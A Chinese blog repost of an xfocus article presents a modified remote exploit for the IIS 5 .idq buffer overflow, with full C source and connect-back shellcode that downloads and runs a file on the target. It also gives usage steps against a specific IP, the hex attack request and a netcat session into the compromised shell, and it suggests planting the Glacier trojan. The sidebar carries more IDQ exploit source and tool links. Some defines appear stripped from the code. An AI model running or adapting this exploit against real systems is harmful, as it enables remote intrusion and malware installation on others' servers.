IIS的.idq/.ida溢出漏洞

最新推荐文章于 2024-04-20 18:32:57 发布
最新推荐文章于 2024-04-20 18:32:57 发布
阅读量1.7k 收藏
点赞数
分类专栏: 漏洞利用 文章标签: iis struct microsoft socket c download
by isno(isno@xfocus.org)

  IIS的.idq/.ida映射的溢出漏洞已经公布了好久了,但由于利用这个漏洞有
比较大的难度,所以可用的攻击程序一直也没弄出来。甚至连发现这个漏洞的
eEye也没做出攻击程序来,由于发送的内容被转换成了宽字符,所以覆盖用的
溢出地址比较难以控制,按照eEye的办法,是在shellcode前面放上很多NOP这样
就把shellcode推向了0x004x00xx的地址,就可以用xx4x这样的串来覆盖ret,这
个串被扩展为xx004x00以后正好跳转到shellcode的位置。这种方法虽然理论上
行的通,但是实际上问题非常多,可以控制跳转却无法执行代码,而且不同的机
器这个0x004x00xx都不一样,这样就很难做出通用性比较好的exploit。

  昨天终于看到公布了可用的攻击程序,一开始没仔细看还以为是骗人的。后
来用softice跟了一下,又请教了一下袁哥才搞明白。这个exploit写得很不错,
用巧妙的方法避开来被扩展成宽字符,可以随意控制跳转地址,利用他的方法可
以很轻松的改写出更完善的exploit。

  这个程序的shellcode比较简单,只是连到指定主机的指定端口去接受数
据,然后把它存为aa.exe,然后运行aa.exe。但它和以前的对付.htr溢出的那个
iishack不一样,它不能主动请求数据,而只能等待那边的主机发送数据,所以
你不能用它来下载指定的程序,而必须由攻击端的攻击程序来开个进程等待发送
数据到被攻击的主机。

  我把这个程序稍微改了一下,使它可以攻击中文版IIS5。因为过几天要考
试,我也没有时间再写个新程序了,只有等考完后在弄。下面就是我改良过
的.idq exploit程序,作了一些比较详细的注解:

-------------------------------idq.c---------------------------------------
/*
IIS5.0 .idq overrun remote exploit
Programmed by hsj : 01.06.21

code flow:
  overrun -> jmp or call ebx -> jmp 8 ->
  check shellcode addr and jump to there ->
  shellcode -> make back channel -> download & exec code
*/
/*
Modified by isno
对中文版WIN2k + IIS 5.0 + SP0攻击成功!
在RedHat6.2上编译
*/


















/* 这是中文版WIN2K(没有安装SP)中jmp ebx的地址*/



/*中文版GetModuleHandleA和GetProcAddress的地址*/
/*这两个API的地址固定了,这样通用性不好,其实可以用shellcode来搜索*/


/*GetModuleHandleA的地址在shellcode中的偏移位置*/


/*同上*/


/*
  作者选择了覆盖SEH,这样可以避免覆盖掉某些形参而引起的错误,
  但根据我的测试,覆盖RET也是一样的
*/









/*做了一些编码,以免地址或端口中还有/0字节而截断shellcode*/


/*shellcode要连接的端口,不要用80,因为80一般都被占用了*/


/*
  !!!注意:上面这个地方是必须要更改的地方!!!
  这是你发起攻击的主机地址,就是你运行攻击程序的那台主机。
*/



/*都是一些偏移量*/

unsigned char shellcode[]=
"/x5B/x33/xC0/x40/x40/xC1/xE0/x09/x2B/xE0/x33/xC9/x41/x41/x33/xC0"
"/x51/x53/x83/xC3/x06/x88/x03/xB8/xDD/xCC/xBB/xAA/xFF/xD0/x59/x50"
"/x43/xE2/xEB/x33/xED/x8B/xF3/x5F/x33/xC0/x80/x3B/x2E/x75/x1E/x88"
"/x03/x83/xFD/x04/x75/x04/x8B/x7C/x24/x10/x56/x57/xB8/xDD/xCC/xBB"
"/xAA/xFF/xD0/x50/x8D/x73/x01/x45/x83/xFD/x08/x74/x03/x43/xEB/xD8"
"/x8D/x74/x24/x20/x33/xC0/x50/x40/x50/x40/x50/x8B/x46/xFC/xFF/xD0"
"/x8B/xF8/x33/xC0/x40/x40/x66/x89/x06/xC1/xE0/x03/x50/x56/x57/x66"
"/xC7/x46/x02/xBB/xAA/xC7/x46/x04/x44/x33/x22/x11"

"/x66/x81/x76/x02/x41/x41/x81/x76/x04/x41/x41/x41/x41"

"/x8B/x46/xF8/xFF/xD0/x33/xC0"
"/xC7/x06/x5C/x61/x61/x2E/xC7/x46/x04/x65/x78/x65/x41/x88/x46/x07"
"/x66/xB8/x80/x01/x50/x66/xB8/x01/x81/x50/x56/x8B/x46/xEC/xFF/xD0"
"/x8B/xD8/x33/xC0/x50/x40/xC1/xE0/x09/x50/x8D/x4E/x08/x51/x57/x8B"
"/x46/xF4/xFF/xD0/x85/xC0/x7E/x0E/x50/x8D/x4E/x08/x51/x53/x8B/x46"
"/xE8/xFF/xD0/x90/xEB/xDC/x53/x8B/x46/xE4/xFF/xD0/x57/x8B/x46/xF0"
"/xFF/xD0/x33/xC0/x50/x56/x56/x8B/x46/xE0/xFF/xD0/x33/xC0/xFF/xD0";
/*shellcode实现连接到攻击端并下载程序的功能,这个程序必须在攻击端主机上*/

unsigned char storage[]=
"/xEB/x02"
"/xEB/x4E"
"/xE8/xF9/xFF/xFF/xFF"
"msvcrt.ws2_32.socket.connect.recv.closesocket."
"_open._write._close._execl.";
/*这是前面的shellcode用来跳到后面并寻址字符串*/

unsigned char forwardjump[]=
"%u08eb";
/*这是覆盖异常结构的jmp 08h,用来跳到后面寻址shellcode的那段代码*/
/*
  作者在前面加了一个%u符号,这样就可以免于被扩展成宽字符,这方法
  太妙了!至于IIS是这样处理%u的,可以参见bbs.nsfocus.com上袁哥反汇编
  的代码。后面的返回地址和跳转shellcode的代码也作了同样的处理。
*/

unsigned char jump_to_shell[]=
"%uC033%uB866%u031F%u0340%u8BD8%u8B03"
"%u6840%uDB33%u30B3%uC303%uE0FF";
/*
  跳转到shellcode去,我不一句句的解释了,如果有兴趣可以自己看,
  注意每两个字节都是反的,%uC033在转换后变成了/x33/xC0。
*/

unsigned int resolve(char *name)
{
  struct hostent *he;
  unsigned int ip;

  if((ip=inet_addr(name))==(-1))
  {
  if((he=gethostbyname(name))==0)
  return 0;
  memcpy(&ip,he->h_addr,4);
  }
  return ip;
}
/*域名->IP*/

int make_connection(char *address,int port)
{
  struct sockaddr_in server,target;
  int s,i,bf;
  fd_set wd;
  struct timeval tv;

  s = socket(AF_INET,SOCK_STREAM,0);
  if(s<0)
  return -1;
  memset((char *)&server,0,sizeof(server));
  server.sin_family = AF_INET;
  server.sin_addr.s_addr = htonl(INADDR_ANY);
  server.sin_port = 0;

  target.sin_family = AF_INET;
  target.sin_addr.s_addr = resolve(address);
  if(target.sin_addr.s_addr==0)
  {
  close(s);
  return -2;
  }
  target.sin_port = htons(port);
  bf = 1;
  ioctl(s,FIONBIO,&bf);
  tv.tv_sec = 10;
  tv.tv_usec = 0;
  FD_ZERO(&wd);
  FD_SET(s,&wd);
  connect(s,(struct sockaddr *)&target,sizeof(target));
  if((i=select(s+1,0,&wd,0,&tv))==(-1))
  {
  close(s);
  return -3;
  }
  if(i==0)
  {
  close(s);
  return -4;
  }
  i = sizeof(int);
  getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
  if((bf!=0)||(i!=sizeof(int)))
  {
  close(s);
  errno = bf;
  return -5;
  }
  ioctl(s,FIONBIO,&bf);
  return s;
}
/*上面是连接主机的函数*/

/*
  下面这个函数很重要,它监听在前面定义的那个的端口,我用了555,
  一旦有主机连接过来,后面那个进程就把本地的一个程序发送过去,
  这个程序当然也是在运行时指定的。
*/
int get_connection(int port)
{
  struct sockaddr_in local,remote;
  int lsock,csock,len,reuse_addr;

  lsock = socket(AF_INET,SOCK_STREAM,0);
  if(lsock<0)
  {
  perror("socket");
  exit(1);
  }
  reuse_addr = 1;
  if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char *)&reuse_addr,sizeof(reuse_addr))<0)
  {
  perror("setsockopt");
  close(lsock);
  exit(1);
  }
  memset((char *)&local,0,sizeof(local));
  local.sin_family = AF_INET;
  local.sin_port = htons(port);
  local.sin_addr.s_addr = htonl(INADDR_ANY);
  if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0)
  {
  perror("bind");
  close(lsock);
  exit(1);
  }
  if(listen(lsock,1)<0)
  {
  perror("listen");
  close(lsock);
  exit(1);
  }
retry:
  len = sizeof(remote);
  csock = accept(lsock,(struct sockaddr *)&remote,&len);
  if(csock<0)
  {
  if(errno!=EINTR)
  {
  perror("accept");
  close(lsock);
  exit(1);
  }
  else
  goto retry;
  }
  close(lsock);
  return csock;
}

int main(int argc,char *argv[])
{
  int i,j,s,pid;
  unsigned int cb;
  unsigned short port;
  char *p,buf[512],buf2[512],buf3[2048];
  FILE *fp;

  if(argc!=3)
  {
  printf("usage: $ %s ip file/n",argv[0]);
  return -1;
  }
  if((fp=fopen(argv[2],"rb"))==0)
  return -2;

  if(!(cb=resolve(ADDR)))
  return -3;

  if((pid=fork())<0)
  return -4;

/*
  开两个进程一个用于构造并发送shellcode,
  另一个监听指定端口并等待发送数据。
*/
  if(pid)
  {
  fclose(fp);
  s = make_connection(argv[1],80);
  if(s<0)
  {
  printf("connect error:[%d]./n",s);
  kill(pid,SIGTERM);
  return -5;
  }

  j = strlen(shellcode);
  *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA;
  *(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS;
  port = htons(PORT);

  port ^= PORTMASK;
  cb ^= ADDRMASK;
  *(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK;
  *(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK;

  *(unsigned short *)&shellcode[PORT_OFFSET] = port;
  *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;
  for(i=0;i<strlen(shellcode);i++)
  {
  if((shellcode[i]==0x0a)||
 (shellcode[i]==0x0d)||
 (shellcode[i]==0x3a))
  break;
  }
  if(i!=j)
  {
  printf("bad portno or ip address.../n");
  close(s);
  kill(pid,SIGTERM);
  return -6;
  }

  memset(buf,1,sizeof(buf));
  p = &buf[OFFSET-2];
  sprintf(p,"%s",forwardjump);
  p += strlen(forwardjump);
  *p++ = 1;
  *p++ = '%';
  *p++ = 'u';
  sprintf(p,"%04x",(RET>>0)&0xffff);
  p += 4;
  *p++ = '%';
  *p++ = 'u';
  sprintf(p,"%04x",(RET>>16)&0xffff);
  p += 4;
  *p++ = 1;
  sprintf(p,"%s",jump_to_shell);

  memset(buf2,NOP,sizeof(buf2));
  memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],storage,strlen(storage));
  memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(shellcode));
  buf2[sizeof(buf2)-1] = 0;

  sprintf(buf3,"GET /a.idq?%s=a HTTP/1.0/r/nShell: %s/r/n/r/n",buf,buf2);
 
/*
  上面就是构造溢出串,溢出串在被扩展并拷贝入IIS的堆栈后形式如下:
 ..............| 异常链 |处理指针|.................
  010001000100.....|eb080100|97ace477|010033c0.........
 |jmp 08h | jmp ebx|jmp shellcode
*/

  write(s,buf3,strlen(buf3));

  printf("---");
  for(i=0;i<strlen(buf3);i++)
  {
  if((i%16)==0)
  printf("/n");
  printf("%02X ",buf3[i]&0xff);
  }
  printf("/n---/n");

  wait(0);
  sleep(1);
  shutdown(s,2);
  close(s);

  printf("Done./n");
  }
  /*下面这个进程用于建立连接,并打开指定文件并发送出去*/
  else
  {
  s = get_connection(PORT);
  j = 0;
  while((i=fread(buf,1,sizeof(buf),fp)))
  {
  write(s,buf,i);
  j += i;
  printf(".");
  fflush(stdout);
  }
  fclose(fp);
  printf("/n%d bytes send.../n",j);

  shutdown(s,2);
  close(s);
  }

  return 0;
}
-------------------------idq.c-----cut here-----------------------------

整个程序攻击的流程是这样的:
 
 攻击端 被攻击端
1.发送shellcode
  --------------->
2. 溢出并运行shellcode

3.监听555端口等待连接

4. 连接到攻击端555端口
  <-------------------
 
5.发送文件数据
  -------------------->
 
6 接受文件为aa.exe并执行

下面是演示一下具体的用法的实例:

先到一台linux主机上编译idq.c。gcc -o idq idq.c

!!!注意一定先改一下程序中的#define ADDR "111.111.111.111"为你这台
linux主机的IP地址!!!

然后上传一个ncx99.exe到这台主机放在同一个目录下:
bash# ls -al
total 90
drwxrwxrwt 7 root root 1024 Aug 30 05:25 .
drwxr-xr-x17 root root 1024 Aug 28 15:47 ..
drwxrwxrwt 2 xfsxfs1024 May 14 03:03 .font-unix
-rwxr-xr-x 1 root root18526 Aug 30 05:25 idq
-rw-r--r-- 1 root root 8149 Aug 30 05:25 idq.c
-rw-rw-rw- 1 root root59392 Aug 171999 ncx99.exe
假设要攻击61.135.19.222,就这样:
bash# ./idq 61.135.19.222 ncx99.exe
---
47 45 54 20 2F 61 2E 69 64 71 3F 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 25 75 30 38 65 62 01 25 75 61 63 39 37
25 75 37 37 65 34 01 25 75 43 30 33 33 25 75 42
38 36 36 25 75 30 33 31 46 25 75 30 33 34 30 25
75 38 42 44 38 25 75 38 42 30 33 25 75 36 38 34
30 25 75 44 42 33 33 25 75 33 30 42 33 25 75 43
33 30 33 25 75 45 30 46 46 3D 61 20 48 54 54 50
2F 31 2E 30 0D 0A 53 68 65 6C 6C 3A 20 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 EB 02 EB 4E E8 F9
FF FF FF 6D 73 76 63 72 74 2E 77 73 32 5F 33 32
2E 73 6F 63 6B 65 74 2E 63 6F 6E 6E 65 63 74 2E
72 65 63 76 2E 63 6C 6F 73 65 73 6F 63 6B 65 74
2E 5F 6F 70 65 6E 2E 5F 77 72 69 74 65 2E 5F 63
6C 6F 73 65 2E 5F 65 78 65 63 6C 2E 5B 33 C0 40
40 C1 E0 09 2B E0 33 C9 41 41 33 C0 51 53 83 C3
06 88 03 B8 DB 56 E7 77 FF D0 59 50 43 E2 EB 33
ED 8B F3 5F 33 C0 80 3B 2E 75 1E 88 03 83 FD 04
75 04 8B 7C 24 10 56 57 B8 4B 56 E7 77 FF D0 50
8D 73 01 45 83 FD 08 74 03 43 EB D8 8D 74 24 20
33 C0 50 40 50 40 50 8B 46 FC FF D0 8B F8 33 C0
40 40 66 89 06 C1 E0 03 50 56 57 66 C7 46 02 43
6A C7 46 04 8B 2D 63 51 66 81 76 02 41 41 81 76
04 41 41 41 41 8B 46 F8 FF D0 33 C0 C7 06 5C 61
61 2E C7 46 04 65 78 65 41 88 46 07 66 B8 80 01
50 66 B8 01 81 50 56 8B 46 EC FF D0 8B D8 33 C0
50 40 C1 E0 09 50 8D 4E 08 51 57 8B 46 F4 FF D0
85 C0 7E 0E 50 8D 4E 08 51 53 8B 46 E8 FF D0 90
EB DC 53 8B 46 E4 FF D0 57 8B 46 F0 FF D0 33 C0
50 56 56 8B 46 E0 FF D0 33 C0 FF D0 0D 0A 0D 0A
---
...............................................................................
....................................
59392 bytes send...
Done.
然后文件已经传过去并运行了,等几秒种,然后就可以连接上去了!
bash# nc -vv 61.135.19.222 99
61.135.19.222: inverse host lookup failed: Unknown host
(UNKNOWN) [61.135.19.222] 99 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.

C:/WINNT/system32>cd/
cd/

C:/>dir
dir
驱动器 C 中的卷没有标签。
卷的序列号是 CC31-6B3C

C:/ 的目录

1997-01-1116:54297 1.pl
2001-07-0103:08 59,392 aa.exe
1997-01-0616:44 <DIR>Documents and Settings
2001-06-3016:21 <DIR>download
2001-05-0219:17 <DIR>Inetpub
2001-05-2116:35 <DIR>mp3
2001-05-0221:48 <DIR>mysql
2001-05-0221:45 <DIR>Perl
2001-05-0221:57 <DIR>php
2001-06-3016:24 <DIR>Program Files
2001-06-2201:47 <DIR>tool
2001-06-3016:23 <DIR>WINNT
.........
.........
.........
  28 个文件383,912 字节
  13 个目录353,680,384 可用字节

C:/>exit
sent 13, rcvd 2326
bash#
你也可以传个冰河Server端上去,随便你了!

写完这些我感到有点失落,因为漏洞不是我发现的,攻击程序不是我写的,
我也只能跟在那些高手的后面拾人牙慧,唉...还需要再努力学习。



欢迎访问http://www.xfocus.org
aiwtu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IIS的安全问题与解决方案
民兵的家园
11-28 2150
1 引言网站是网络服务开展的基点,是网络系统的最前沿阵地,较易成为被攻击的目标,其安全的重要性不言而喻。许多网站因为多种因素的制约采用了相对简单易用的NT(Windows NT/2000/2003)+IIS(Internet Information Server)的架构,由于各站点的技术力量和管理水平存在较大差距,因此网站的安全性也参差不齐,只有少数的IIS网站具有较高安全性。虽然IIS已默认配置
利用IDA_Pro发掘和分析安全漏洞
03-10
怎样使用ida发现并分析漏洞,能让你早日发现有价值的漏洞
ida.rar_C Builder_ida
09-24
ida encryption algorithm
iis6提权_iis6提权工具.exe
09-20
iis6提权_iis6提权工具.exe 亲自试用过,只适合iis6,对于高版本不支持
SiCore.sys 滴水中级 IDA训练 逆向训练 完全版
10-26
SiCore.sys 滴水中级 IDA训练 逆向训练 完全版 不是别人上传的那种不全版本 包含SiCore.sys和 SiCore.sys.ida
IDA逆向分析缓冲区溢出攻击漏洞实例.rar
03-12
很好的逆向分析的学习资料!!! https://blog.csdn.net/wlwdecs_dn/article/details/114708775
jni.h文件,完美适配ida软件,直接就可以使用。
09-26
jni.h文件,完美适配ida软件,直接可以使用。jni.h文件,完美适配ida软件,直接可以使用。
基于漏洞的入侵(一)
04-22 2861
基于漏洞的入侵(一) [ 2007-7-19 18:22:00 | By: emile ]  
Microsoft IIS .IDA / 扩展远程路径泄露漏洞
weixin_34101784的博客
03-15 453
受影响系统:   Microsoft IIS 4.0   - Microsoft Windows NT 4.0 SP6a   - Microsoft Windows NT 4.0 SP6   - Microsoft Windows NT 4.0 SP5   - Microsoft Windows NT 4.0 SP4   - Microsoft Windows N...
OSSIM开源安全信息管理系统(九)
m0_47470899的博客
11-05 401
2021SC@SDUSC 本周继续分析 OSSIM 系统 Framework 部分的源代码,对 Framework.py 所引用的其他类进行进一步分析。 同时,会对 OSSIM 的可疑流量检测技术进行部分分析,其余内容放在下周进行 一、源代码分析: get_current_backup_files(self) : 该函数主要功能为获取当前的备份文件,并将结果存放到 backup_files 中 def get_current_backup_files(self): backup_files = [
windows常见漏洞分析(一)
jian436的专栏
10-13 1479
nc.exe(iisidq漏洞利用工具)
11-04
在使用snakeIISIDQ工具对iisidq漏洞进行溢出成功后,可以利用nc进入目标主机的cmd中并建立用户以及提权。 例如snakeIISIDQ溢出的目标主机为192.168.5.4,溢出的端口是813,则进入目标主机cmd命令如 nc -vvv 192.168.5.4 813
snakeIISIDQIISMiscOverflowV2_Build0016.exe)
11-04
用于对iis主机的IDQ漏洞进行内存溢出,配合nc.exe可以实现映射,进而对其建立用户与提权(加入管理员组)
IIS6.exe提权工具
04-28
iis6.exe提权工具,iis6.exe提权工具,iis6.exe提权工具,iis6.exe提权工具iis6.exe提权工具
IDQ漏洞溢出源代码
10-19
IIS5_IDQ溢出。。。从Internet上学习到的,也让他回归internet.<br><br> <br><br>文件结构:<br><br>cpp文件: iisidqoverflow.cpp 和 SkShellCodeFunc.cpp <br>头文件: SkShellCodeFunc.h <br>功能文件: WSAStart.cpp和SnakeSocket.cpp wsastart.h snakesocket.h(这4个文件不提供...因为,他们实现的只是WSAStart和socket的功能,你要成功编译本程序,必须自己替换相关的WSAStart和socket功能的代码.特此声明!) <br>中间文件: iis_idq.asm --用来实现shellcode数据的文件,编译的时候,不必编译,只是为了中间产生shellcode数据.它实现了溢出后,程序的处理:创建一个进程,并且绑定一个端口。这个还可以用于其他的windows溢出. <br> <br><br>文件1:iisidqoverflow.cpp (主文件)<br><br><br><br>#include <br>#include "snakesocket.h"<br>#include "wsastart.h"<br>#include "SkShellCodeFunc.h"<br><br>//function predeclare.<br>//取得 需要 地址 信息<br>void GetNecesProcAddr( char *szInfo, int iMaxSize);<br>//生成我的 shell code代码.<br>int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd);<br><br><br>//宣示帮助.<br>void ShowHelp()<br>{<br>int i;<br><br>printf("运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>\r\n");<br>printf(" 或者: 操作系统类型 目的地址 web端口 2 溢出连接IP 溢出连接端口 <输入命令1>\r\n");<br>printf("\r\n\r\n 其中,如果输入命令参数没有输入,那么,默认为:\"cmd.exe /c + dir\"");<br>printf("\r\n 如果为1,那么,将输入新的命令.");<br><br>printf("\r\n\r\n支持的操作系统 类型: ----\r\n");<br><br>for( i=0; i 0){<br>send( msocket, szBuff, iLen, 0);<br>}<br><br>return (iLen>0)?true:false;<br>}<br><br>int main(int argc, char *argv[])<br>{<br>CWSAStart wsaStart;<br>CSnakeSocket snakeSocket;<br>WORD wPort;<br>DWORD dwIP;<br><br>if( argc > 1){<br>if( stricmp( argv[1], "GetAddr") == 0){<br>char szTemp[12048];<br>GetNecesProcAddr(szTemp, sizeof(szTemp) );<br><br>printf("%s\r\n",szTemp);<br><br>OSVERSIONINFO osInfo;<br><br>osInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);<br>GetVersionEx( &osInfo);<br>printf("Version: %d - %d. Build:%d. ID:%d\r\n[%s]\r\n", <br>osInfo.dwMajorVersion, osInfo.dwMinorVersion,<br>osInfo.dwBuildNumber, osInfo.dwPlatformId,<br>osInfo.szCSDVersion);<br>return 0;<br>}<br>}<br>if( argc < 5){<br>ShowHelp();<br>return 0;<br>}<br>wsaStart.StartUP();<br><br>SYSTEM_TYPE SystemType = (SYSTEM_TYPE)atoi(argv[1]);<br>if( SystemType >= MAX_SYSTEM_TYPE_NUM){<br>printf("操作系统类型 不正确.\r\n");<br>ShowHelp();<br>return 0;<br>}<br>dwIP = snakeSocket.GetHostAddr( argv[2]);<br>if( dwIP == 0){<br>printf("输入地址不对.\r\n");<br>return 0;<br>}<br><br>Sk_ConnectType connectType;<br>ConnectStruct connectStruct;<br>char szCommand[129]="cmd.exe /c dir c:\\";<br>BOOL bInputCommand=false;<br><br>connectType = (Sk_ConnectType)atoi(argv[4]);<br>connectStruct.byConnectType = connectType;<br>switch(connectType){<br>case LISTEN_ON_PORT:<br>connectStruct.wListenPort = atoi(argv[5]);<br>if( argc >= 7){<br>bInputCommand = true;<br>}<br>break;<br>case CONNECT_TO_HOST:<br>if( argc < 6){<br>printf("参数不足够.\r\n");<br>return 0;<br>}<br>connectStruct.dwConnectIP = snakeSocket.GetHostAddr(argv[5]);<br>connectStruct.wConnectPort = atoi(argv[6]);<br>if( argc >= 8){<br>bInputCommand = true;<br>}<br>break;<br>default:<br>printf("溢出类型不正确.\r\n");<br>return 0;<br>}<br><br>if( bInputCommand){<br>printf("\r\n请输入绑定的命令:");<br>scanf( "%s",szCommand);<br>}<br><br>snakeSocket.CreateSocket();<br>wPort = atoi(argv[3]);<br><br>if( !snakeSocket.connect( argv[2], wPort)){<br>printf("连接目的机器 %s:%d 失败.\r\n", argv[2], wPort);<br>return 0;<br>}<br>else<br>printf("连接目的机器 %s:%d OK.\r\n", argv[2], wPort);<br><br>BOOL bValue = SendIDQExploit( snakeSocket.m_Socket, SystemType, &connectStruct, szCommand);<br><br>if( bValue){<br>printf( "发送shellcode 到 %s:%d OK\r\n", argv[2], wPort);<br>printf(" 现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [%s] 结果了...,good luck.!", szCommand);<br>}<br>else{<br>printf( "发送失败, 对方系统类型不支持\r\n");<br>}<br><br>snakeSocket.CloseSocket();<br>wsaStart.CleanUP();<br><br>return 0;<br>}
coderedII攻击IIS的.ida .idq溢出漏洞的蠕虫
12-09
coderedII攻击IIS的.ida .idq溢出漏洞的蠕虫 .rar
解锁ApplicationContext vs BeanFactory: 谁更具选择性?
最新发布
张彦峰的博客
04-20 5965
解锁ApplicationContext vs BeanFactory: 谁更具选择性?如果你的应用程序需要更全面的功能,如事件发布、资源加载等,并且不太在意启动速度和资源占用,那么 ApplicationContext 是更好的选择。但是,如果你的应用程序对启动速度和资源占用有较高的要求,或者只需要基本的 IoC 容器功能,那么 BeanFactory 可能更适合你。
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8697
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3093
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
ida.zip怎么进行安装
11-30
ida.zip 是一个压缩文件,通常包含了IDA(Interactive Disassembler)软件的安装文件。要进行安装,首先需要解压缩ida.zip文件。您可以通过双击ida.zip文件或者使用解压缩软件来解压缩文件,然后将解压后的文件夹保存到您想要安装IDA软件的目录中。 一旦ida.zip文件被解压缩并保存到目标文件夹中,您可以打开文件夹并找到IDA软件的安装文件。通常情况下,IDA软件的安装文件是一个可执行文件,比如setup.exe或者install.sh。双击这个文件来启动安装过程。 在安装过程中,您需要按照安装向导的指示来完成安装。这可能包括选择安装目录、确认许可协议、选择安装组件等步骤。一旦安装完成,您就可以在您选择的安装目录中找到IDA软件,并可以开始使用它进行反汇编和分析工作了。 总的来说,安装ida.zip文件就是解压缩并运行其中的安装文件,然后按照安装向导指示完成安装过程。希望以上回答能够帮助您安装IDA软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值